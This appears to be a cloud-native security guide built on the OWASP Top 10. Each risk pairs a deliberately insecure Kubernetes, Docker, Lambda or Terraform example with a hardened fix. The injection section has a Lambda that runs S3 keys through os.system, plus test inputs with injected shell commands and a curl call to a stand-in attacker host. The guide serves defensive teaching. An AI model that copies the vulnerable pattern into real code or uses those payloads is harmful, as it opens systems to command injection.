The 10 most critical security risks for cloud-native applications and how to mitigate them.
The OWASP Cloud-Native Application Security Top 10 identifies the most prominent security risks for cloud-native applications running on Kubernetes, Docker, and serverless platforms. It covers misconfigurations, supply chain risks, secrets management, and more across the entire cloud-native stack.
Misconfigured cloud services, containers, and orchestrators are the leading cause of cloud-native breaches. This includes running containers as root, using default configurations, exposing the Kubernetes API server publicly, and failing to enable audit logging on cloud resources.
Attackers can exploit misconfigurations to gain full cluster control, escape containers, access cloud metadata services, or pivot across the infrastructure. A single misconfigured S3 bucket or open Kubernetes dashboard has led to massive data breaches.
```dockerfile
# Running container as root with no resource limits
FROM ubuntu:latest
RUN apt-get update && apt-get install -y curl wget
COPY app /app
# No USER directive — runs as root!
CMD ["/app/server"]
```
```dockerfile
FROM gcr.io/distroless/static:nonroot
COPY --chown=65534:65534 app /app
USER 65534:65534
EXPOSE 8080
ENTRYPOINT ["/app/server"]
```
Cloud-native applications receive input not only from traditional HTTP requests but also from cloud events (SQS, Pub/Sub, EventBridge), serverless triggers, and inter-service communication. Injection flaws in any of these vectors can lead to command execution, data exfiltration, or privilege escalation.
Serverless functions triggered by cloud events may process untrusted data without validation, leading to OS command injection, NoSQL injection, or event-driven SSRF. Attackers can poison message queues or event buses to compromise downstream services.
```python
# Lambda function processing S3 event without sanitizing filename
import os

def handler(event, context):
    bucket = event['Records'][0]['s3']['bucket']['name']
    key = event['Records'][0]['s3']['object']['key']
    # Command injection via crafted filename!
    os.system(f"aws s3 cp s3://{bucket}/{key} /tmp/{key}")
```
```python
import boto3, re
from urllib.parse import unquote_plus

def handler(event, context):
    s3 = boto3.client('s3')
    bucket = event['Records'][0]['s3']['bucket']['name']
    key = unquote_plus(event['Records'][0]['s3']['object']['key'])
    # Validate key against allowlist pattern
    if not re.match(r'^[\w\-./]+$', key):
        raise ValueError(f"Invalid S3 key: {key}")
    # Use SDK instead of shell commands
    s3.download_file(bucket, key, f'/tmp/{key.split("/")[-1]}')
```
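To see why the allowlist matters, the same pattern used in the hardened handler can be exercised against hostile object keys. A minimal sketch (the helper name and sample keys are illustrative):

```python
import re

# Same allowlist pattern as the hardened handler
S3_KEY_PATTERN = re.compile(r'^[\w\-./]+$')

def is_safe_key(key: str) -> bool:
    """Accept only keys built from word chars, '-', '.', and '/'."""
    return S3_KEY_PATTERN.match(key) is not None

# A legitimate object key passes
print(is_safe_key("uploads/report-2024.csv"))  # True
# Keys crafted for shell injection are rejected: ';', spaces, '$' fall
# outside the character class, so the anchored match fails
print(is_safe_key("x.txt; rm -rf /tmp"))       # False
print(is_safe_key("$(curl evil.example)"))     # False
```

Rejecting anything outside a small known-good set is safer than trying to blocklist shell metacharacters one by one.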
Cloud-native environments involve multiple layers of identity: cloud IAM, Kubernetes RBAC, service mesh mTLS, and application-level auth. Misconfigured or overly permissive policies at any layer can allow lateral movement, privilege escalation, or unauthorized access to sensitive resources.
Over-permissive IAM roles assigned to pods can grant workloads access to the entire cloud account. Missing service-to-service authentication allows any compromised pod to impersonate other services.
```yaml
# Overly permissive ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: default-admin
subjects:
- kind: ServiceAccount
  name: default  # Default SA — shared by all pods!
  namespace: default
roleRef:
  kind: ClusterRole
  name: cluster-admin  # Full cluster access!
  apiGroup: rbac.authorization.k8s.io
```
```yaml
# Dedicated ServiceAccount with minimal Role
apiVersion: v1
kind: ServiceAccount
metadata:
  name: order-service
  namespace: production
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456:role/order-svc
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: order-service-role
  namespace: production
rules:
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["get"]
```
CI/CD pipelines are high-value targets because they have write access to production environments. Compromising a build pipeline enables supply chain attacks, malicious code injection, and deployment of backdoored images. Insecure pipeline configurations, poisoned base images, and unsigned artifacts all contribute to this risk.
A compromised CI/CD pipeline can deploy malicious code to all environments, steal secrets stored in pipeline variables, or tamper with container images. SolarWinds-style attacks demonstrate the catastrophic impact of supply chain compromise.
```yaml
# Insecure CI pipeline — unpinned actions, no image signing
name: Deploy
on: push
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@main  # Unpinned — could be compromised!
      - run: |
          docker build -t myapp:latest .
          docker push myregistry/myapp:latest  # No signing!
          kubectl apply -f deploy.yaml  # No admission control!
```
```yaml
name: Secure Deploy
on: push
permissions:
  id-token: write
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29  # Pinned SHA
      - run: |
          docker build -t myregistry/myapp:${{ github.sha }} .
          cosign sign myregistry/myapp:${{ github.sha }}  # Sign image
      - run: trivy image myregistry/myapp:${{ github.sha }} --exit-code 1
      - run: kubectl apply -f deploy.yaml  # Admission controller verifies signatures
```
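Pinning by immutable digest rather than mutable tag is the idea behind both the pinned action SHA and signed images. As an illustrative sketch, not a cosign implementation, verifying a fetched build input against a pinned SHA-256 digest looks like this (the helper name and artifact bytes are hypothetical):

```python
import hashlib
import hmac

def verify_artifact(data: bytes, pinned_digest: str) -> bool:
    """Reject the artifact unless its SHA-256 matches the pinned digest."""
    actual = hashlib.sha256(data).hexdigest()
    # Constant-time comparison avoids leaking match length via timing
    return hmac.compare_digest(actual, pinned_digest)

release = b"build artifact bytes"
pinned = hashlib.sha256(release).hexdigest()  # recorded when the input was pinned

print(verify_artifact(release, pinned))               # True
print(verify_artifact(b"tampered artifact", pinned))  # False
```

A tag like `@main` or `:latest` can silently start pointing at different content; a digest cannot, which is why supply chain controls key on it.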
Secrets such as API keys, database credentials, and TLS certificates are often hardcoded in source code, stored in plaintext ConfigMaps, or embedded in container images. Kubernetes Secrets are only base64-encoded by default, not encrypted, providing minimal protection.
Exposed secrets can give attackers direct access to databases, cloud accounts, and third-party services. Secrets in git history, container layers, or environment variables are easily discovered and exploited.
```yaml
# Secrets in plaintext environment variables
apiVersion: v1
kind: Pod
metadata:
  name: my-app
spec:
  containers:
  - name: app
    env:
    - name: DB_PASSWORD
      value: "SuperSecret123!"  # Plaintext in manifest!
    - name: AWS_SECRET_KEY
      value: "AKIA..."  # Cloud credentials in YAML!
```
```yaml
# Use External Secrets Operator with a vault backend
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
  name: my-app-secrets
spec:
  refreshInterval: 1h
  secretStoreRef:
    name: vault-backend
    kind: ClusterSecretStore
  target:
    name: my-app-secrets
  data:
  - secretKey: db-password
    remoteRef:
      key: secret/data/myapp
      property: db-password
```
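The earlier point that Kubernetes Secrets are base64-encoded rather than encrypted is easy to demonstrate: anyone who can read the Secret object recovers the plaintext with a single decode call. A minimal sketch:

```python
import base64

# What `kubectl get secret -o yaml` would show in the `data` field
encoded = base64.b64encode(b"SuperSecret123!").decode()
print(encoded)  # U3VwZXJTZWNyZXQxMjMh

# Anyone with read access to the Secret reverses it instantly
print(base64.b64decode(encoded).decode())  # SuperSecret123!
```

Base64 is an encoding, not encryption: it protects against nothing. RBAC on Secret reads, etcd encryption at rest, and an external secret store are what actually limit exposure.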
By default, Kubernetes allows all pods to communicate with each other without restriction. Missing or overly permissive NetworkPolicies, security groups, and firewall rules enable lateral movement within the cluster and between cloud services.
Without network segmentation, a compromised pod can reach any other service in the cluster, access databases directly, or exfiltrate data to external endpoints. Flat networks amplify the blast radius of any breach.
```yaml
# No NetworkPolicy — all pods can talk to everything
apiVersion: v1
kind: Namespace
metadata:
  name: production
# No NetworkPolicy resources defined
# All ingress and egress traffic is allowed by default
```
```yaml
# Default-deny all traffic, then allow only what's needed
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes: ["Ingress", "Egress"]
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-frontend-to-api
  namespace: production
spec:
  podSelector:
    matchLabels:
      app: api-server
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: frontend
    ports:
    - port: 8080
```
Cloud-native applications rely heavily on open-source base images, libraries, and Kubernetes operators. Running outdated or unpatched components with known CVEs exposes the application to well-documented exploits. Container images often include hundreds of packages, each a potential vulnerability.
Known vulnerabilities in base images (e.g., Log4Shell, OpenSSL bugs) can be exploited using publicly available tools. Attackers actively scan for containers running vulnerable versions. A single unpatched library can compromise the entire workload.
```dockerfile
# Using outdated base image with known CVEs
# node:14 is an EOL version with known vulns
FROM node:14
COPY package.json .
RUN npm install  # No audit, no lockfile verification
COPY . .
CMD ["node", "server.js"]
```
```dockerfile
# Use current, slim base image with vulnerability scanning
FROM node:22-slim AS build
WORKDIR /app
COPY package.json package-lock.json ./
RUN npm ci --only=production  # Reproducible install from lockfile
RUN npm audit --audit-level=high  # Fail on high+ vulns

FROM gcr.io/distroless/nodejs22-debian12
COPY --from=build /app /app
CMD ["/app/server.js"]
```
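Scanners such as Trivy flag a component by comparing its installed version against the first fixed release in an advisory feed. A toy sketch of that comparison (the version numbers echo the Log4Shell fix line mentioned above, but this is illustrative, not a real advisory lookup):

```python
def parse_version(v: str) -> tuple:
    """Split a dotted version string into comparable integer parts."""
    return tuple(int(p) for p in v.split("."))

def is_vulnerable(installed: str, fixed_in: str) -> bool:
    """A package is flagged when it is older than the first fixed release."""
    return parse_version(installed) < parse_version(fixed_in)

# Illustrative only: not real advisory data
print(is_vulnerable("2.14.1", "2.17.1"))  # True: older than the fix
print(is_vulnerable("2.17.2", "2.17.1"))  # False: already patched
```

Real scanners also handle epochs, pre-release tags, and distro-specific version schemes, which is why tuple comparison alone is only a sketch.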
Cloud-native environments make it easy to spin up resources but hard to track them. Orphaned containers, forgotten namespaces, stale cloud resources, and shadow IT deployments create an unmanaged attack surface. Without proper asset inventory, security teams cannot protect what they don't know exists.
Forgotten or unmanaged resources often run outdated software, lack security monitoring, and have stale credentials. Attackers target these neglected assets as entry points because they are less likely to be monitored or patched.
```hcl
# Resources created without tagging or lifecycle management
resource "aws_instance" "test_server" {
  ami           = "ami-0abcdef1234567890"
  instance_type = "t3.medium"
  # No tags — who owns this? What's it for?
  # No lifecycle policy — runs forever
}

resource "aws_s3_bucket" "temp_data" {
  bucket = "temp-data-2024"
  # No expiration, no access logging
}
```
```hcl
resource "aws_instance" "test_server" {
  ami           = "ami-0abcdef1234567890"
  instance_type = "t3.medium"
  tags = {
    Name        = "test-server"
    Owner       = "platform-team"
    Environment = "staging"
    ManagedBy   = "terraform"
    ExpiresAt   = "2026-04-30"
  }
}

resource "aws_s3_bucket" "temp_data" {
  bucket = "temp-data-2024"
  tags = {
    Owner     = "data-team"
    ManagedBy = "terraform"
  }
  lifecycle_rule {
    enabled = true
    expiration {
      days = 90
    }
  }
}
```
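Tagging only pays off when it is enforced: an inventory job can sweep the account and flag anything missing ownership metadata. A minimal sketch, with hypothetical resource records and a tag policy assumed for illustration:

```python
REQUIRED_TAGS = {"Owner", "ManagedBy"}  # tag policy assumed for illustration

def missing_tags(resource: dict) -> set:
    """Return which required tags a resource lacks."""
    return REQUIRED_TAGS - set(resource.get("tags", {}))

# Hypothetical inventory, e.g. from a cloud API listing
inventory = [
    {"id": "i-0abc", "tags": {"Owner": "platform-team", "ManagedBy": "terraform"}},
    {"id": "i-0def", "tags": {}},  # orphan: nobody claims it
]

for r in inventory:
    gaps = missing_tags(r)
    if gaps:
        print(f"{r['id']} is untracked, missing: {sorted(gaps)}")
# prints: i-0def is untracked, missing: ['ManagedBy', 'Owner']
```

A report like this feeds automated cleanup: untracked resources get their owners paged, then get scheduled for deletion.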
Without proper resource quotas and limits, a single misbehaving or compromised workload can consume all available CPU, memory, or storage, causing denial of service for other applications. Cryptojacking attacks are particularly common in environments without resource limits.
Attackers can deploy cryptomining containers or resource-intensive workloads that consume all cluster resources. Without limits, a fork bomb or memory leak in one pod can crash the entire node, affecting all co-located workloads.
```yaml
# Pod with no resource limits
apiVersion: v1
kind: Pod
metadata:
  name: my-app
spec:
  containers:
  - name: app
    image: myapp:latest
    # No resources block — can consume unlimited CPU/memory!
```
```yaml
apiVersion: v1
kind: Pod
metadata:
  name: my-app
spec:
  containers:
  - name: app
    image: myapp:1.2.3
    resources:
      requests:
        cpu: "100m"
        memory: "128Mi"
      limits:
        cpu: "500m"
        memory: "512Mi"
---
# Namespace-level quota
apiVersion: v1
kind: ResourceQuota
metadata:
  name: compute-quota
  namespace: production
spec:
  hard:
    requests.cpu: "10"
    requests.memory: "20Gi"
    limits.cpu: "20"
    limits.memory: "40Gi"
```
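Quota math uses Kubernetes quantity notation: "500m" means 0.5 CPU cores, and "512Mi" means 512 × 2^20 bytes. A minimal parser for just the suffixes used above (not the full Kubernetes quantity grammar):

```python
def parse_cpu(q: str) -> float:
    """'500m' -> 0.5 cores; plain numbers are whole cores."""
    return int(q[:-1]) / 1000 if q.endswith("m") else float(q)

def parse_memory(q: str) -> int:
    """Handle the binary suffixes used in the manifests above."""
    units = {"Ki": 2**10, "Mi": 2**20, "Gi": 2**30}
    for suffix, factor in units.items():
        if q.endswith(suffix):
            return int(q[:-2]) * factor
    return int(q)  # plain bytes

print(parse_cpu("500m"))      # 0.5
print(parse_memory("512Mi"))  # 536870912
# The pod's 512Mi memory limit fits 40 times into the 20Gi request quota
print(parse_memory("20Gi") // parse_memory("512Mi"))  # 40
```

Doing this arithmetic up front shows how many copies of a workload a namespace quota actually admits, which makes capacity and blast-radius planning concrete.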
Cloud-native environments generate logs across multiple layers: application, container runtime, orchestrator, service mesh, and cloud platform. Without centralized logging, correlation across these layers, and runtime threat detection, security incidents go undetected or are discovered too late.
Ephemeral containers lose their logs when terminated, destroying forensic evidence. Without Kubernetes audit logs and runtime monitoring, attackers can create backdoors, escalate privileges, or exfiltrate data without triggering any alerts.
```yaml
# No audit policy, no log forwarding
apiVersion: v1
kind: Pod
metadata:
  name: my-app
spec:
  containers:
  - name: app
    image: myapp:latest
# Logs go to stdout only — lost when pod restarts
# No audit logging configured on the cluster
# No runtime security monitoring
```
```yaml
# Kubernetes audit policy for security events
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
- level: RequestResponse
  resources:
  - group: ""
    resources: ["secrets", "configmaps"]
- level: Metadata
  resources:
  - group: "rbac.authorization.k8s.io"
    resources: ["clusterroles", "clusterrolebindings"]
- level: Metadata
  verbs: ["create", "delete", "patch"]
# Deploy Falco for runtime threat detection
# Forward logs to SIEM via Fluent Bit / Fluentd
```
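On the application side, emitting one JSON record per line to stdout lets a forwarder such as Fluent Bit parse and route events without fragile regexes, and survives pod restarts once shipped off the node. A minimal sketch (field names are illustrative, not a required schema):

```python
import json
import sys
from datetime import datetime, timezone

def log_event(level: str, message: str, **fields) -> None:
    """Write one JSON log record per line to stdout for the log forwarder."""
    record = {
        "ts": datetime.now(timezone.utc).isoformat(),
        "level": level,
        "msg": message,
        **fields,  # arbitrary structured context for SIEM correlation
    }
    sys.stdout.write(json.dumps(record) + "\n")

# Security-relevant events carry the context an analyst needs
log_event("WARN", "failed login", user="alice", source_ip="10.0.3.7")
```

Structured fields like `user` and `source_ip` are what make cross-layer correlation (application log to audit log to network flow) possible in a SIEM.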
| ID | Vulnerability | Severity | Key Mitigation |
|---|---|---|---|
| CNAS-1 | Insecure Cloud/Container/Orchestration Config | Critical | Distroless images, Pod Security Standards, IaC scanning |
| CNAS-2 | Injection Flaws (Cloud Events) | Critical | Input validation, SDK over shell, egress filtering |
| CNAS-3 | Improper Authentication & Authorization | Critical | Least-privilege RBAC, IRSA, mTLS |
| CNAS-4 | CI/CD Pipeline & Supply Chain Flaws | High | Pinned SHAs, image signing, SLSA provenance |
| CNAS-5 | Insecure Secrets Storage | Critical | Vault/Secrets Manager, KMS encryption, secret scanning |
| CNAS-6 | Over-Permissive Network Policies | High | Default-deny, egress restrictions, Calico/Cilium |
| CNAS-7 | Components with Known Vulnerabilities | High | Image scanning, minimal base images, SBOM |
| CNAS-8 | Improper Asset Management | Medium | Resource tagging, automated cleanup, IaC |
| CNAS-9 | Inadequate Compute Resource Quotas | Medium | Resource limits, ResourceQuotas, usage monitoring |
| CNAS-10 | Ineffective Logging & Monitoring | High | Audit logs, Falco/Sysdig, centralized SIEM |